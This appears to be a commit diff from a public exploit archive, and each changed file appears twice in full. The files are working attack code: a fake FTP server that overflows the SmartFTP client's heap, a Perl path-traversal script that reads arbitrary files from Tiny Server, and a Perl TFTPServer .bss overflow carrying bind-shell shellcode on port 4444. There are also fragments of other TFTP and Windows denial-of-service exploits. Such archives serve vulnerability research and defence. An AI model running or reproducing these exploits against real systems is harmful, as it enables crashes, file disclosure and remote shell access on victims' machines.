\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
'''
HOSTNAME = '127.0.0.1'
PORTNO = 69
s.connect((HOSTNAME, PORTNO))
if len(n00bstring) != s.send(n00bstring):
# where to get error message "$!".
print "cannot send to %s(%d):" % (HOSTNAME,PORTNO)
raise SystemExit(1)
MAXLEN = 1024
(data,addr) = s.recvfrom(MAXLEN)
s.close()
print '%s(%d) said "%s"' % (addr[0],addr[1], data)
# milw0rm.com [2006-09-08]

12
platforms/windows/dos/25472.py
View file

@ -9,14 +9,10 @@
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by
Sapling. At this
#time the exploit is only a denial of service but evidence show it may be
controllable.
#The difficulty with controlling it at this point was the failure to
overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than
509 bytes long
#This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this
#time the exploit is only a denial of service but evidence show it may be controllable.
#The difficulty with controlling it at this point was the failure to overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than 509 bytes long
#start of python file
import sys

0
platforms/windows/dos/26010.txt → platforms/windows/dos/26010.py
View file

134
platforms/windows/dos/3277.cpp
View file

@ -1,67 +1,67 @@
/***************************************************************************
* SmartFTP Client v 2.0.1002 Heap Overflow DoS *
* *
* *
* There is remote heap overflow in SmartFTP. When the app receives a long *
* banner (5000 char) the heap is smashed, leading to DoS and to code *
* execution. *
* *
* There are also two buffer overflow in the fields Address and Login. *
* I've reported this to Secunia but it seems they didn't think it was dan- *
* gerous cause they didn't publish anything about. However a simple drag'n *
* drop could compromise your system... *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char evilbuff[5000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memset(evilbuff,'A',5000);
memcpy(evilbuff,"220 ",4);
memcpy(evilbuff+4997,"\r\n\0",3);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
printf("[+] Data sent\n");
Sleep(1500);
if (send(client,"boom?",5,0)==-1)
printf("[+] Crashed? Crashed!\n");
else
printf("[-] Exploit failed!\n");
return 0;
}
// milw0rm.com [2007-02-06]
/***************************************************************************
* SmartFTP Client v 2.0.1002 Heap Overflow DoS *
* *
* *
* There is remote heap overflow in SmartFTP. When the app receives a long *
* banner (5000 char) the heap is smashed, leading to DoS and to code *
* execution. *
* *
* There are also two buffer overflow in the fields Address and Login. *
* I've reported this to Secunia but it seems they didn't think it was dan- *
* gerous cause they didn't publish anything about. However a simple drag'n *
* drop could compromise your system... *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char evilbuff[5000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memset(evilbuff,'A',5000);
memcpy(evilbuff,"220 ",4);
memcpy(evilbuff+4997,"\r\n\0",3);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
printf("[+] Data sent\n");
Sleep(1500);
if (send(client,"boom?",5,0)==-1)
printf("[+] Crashed? Crashed!\n");
else
printf("[-] Exploit failed!\n");
return 0;
}
// milw0rm.com [2007-02-06]

0
platforms/windows/local/35326.cpp → platforms/windows/dos/35326.cpp
View file

109
platforms/windows/remote/35426.pl Executable file
View file

@ -0,0 +1,109 @@
#!/usr/bin/perl -w
#Title : Tiny Server v1.1.9 Arbitrary File Disclosure Exploit
#Download : http://tinyserver.sourceforge.net/tinyserver_full.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 29/11/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
use LWP::Simple;
use LWP::UserAgent;
use IO::Socket;
sub zorban() {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\n\t\t~~~~~~ Software : Tiny Server\n";
print "\n\t\t~~~~~~ Version : 1.1.5\n";
print "\n\t\t~~~~~~ Class : File Disclosure\n";
print "\n\t\t~~~~~~ Wrote by ZoRLu / milw00rm.com\n\n";
}
sub zorhelp() {
print "[+] perl $0 127.0.0.1 80 windows/system.ini\n";
}
if(@ARGV != 3) {
zorban();
print "[-] not this! like this:\n";
zorhelp();
exit();
}
sub zoragent {
my @array = ('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36');
my $zrl = $array[rand @array];
return($zrl);
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
my $file = $ARGV[2];
my $path = "/../../"; # you can change for your file path. because its for file of "windows" folder
my $link1 = "http://" . $ip . ":" . $port;
my $link2 = "http://" . $ip . ":" . $port . $path . $file;
my $useragent = zoragent();
my $zoa = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$zoa->timeout(60);
$zoa->agent($useragent);
my $status = $zoa->get("$link2");
unless ($status->is_success) {
zorban();
print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
sleep(1);
print "\n[-] Error: " . $status->status_line . "\n";
print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
exit;
} else {
zorban();
print("Connect : $link1\n");
sleep(1);
print("Read : $file\n");
sleep(1);
$readfile = get $link2;
print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("$readfile");
print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
exit;
}

224
platforms/windows/remote/5563.pl
View file

@ -1,112 +1,112 @@
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
use IO::Socket::INET;
my $target = shift ||
die "Usage: $0 <target> <type>\n <type> : type of the program\n".
"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
if ($type =~ /p/i) {
# "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
# ---------------------------------------------------------------------------
# 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
# ---------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
# "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
# ------------------------------------------------------------------------
# 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
# ------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer Service program\n";
$buffer = "\x90" x 19955 . $shellcode . $RET;
}
my $sock = IO::Socket::INET->new( PeerAddr => $target,
PeerPort => 69,
Proto => 'udp')
or die "error: $!\n";
$sock->send("\x00\x05" . $buffer, 0);
print STDOUT "done.\n";
exit 0;
# milw0rm.com [2008-05-08]
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
use IO::Socket::INET;
my $target = shift ||
die "Usage: $0 <target> <type>\n <type> : type of the program\n".
"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
if ($type =~ /p/i) {
# "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
# ---------------------------------------------------------------------------
# 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
# ---------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
# "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
# ------------------------------------------------------------------------
# 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
# ------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer Service program\n";
$buffer = "\x90" x 19955 . $shellcode . $RET;
}
my $sock = IO::Socket::INET->new( PeerAddr => $target,
PeerPort => 69,
Proto => 'udp')
or die "error: $!\n";
$sock->send("\x00\x05" . $buffer, 0);
print STDOUT "done.\n";
exit 0;
# milw0rm.com [2008-05-08]

6
platforms/windows/remote/955.py
View file

@ -186,6 +186,6 @@ if __name__ == '__main__':
exp.setbsize(1014)
exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
exp.exploit()
# milw0rm.com [2005-04-26]
exp.exploit()
# milw0rm.com [2005-04-26]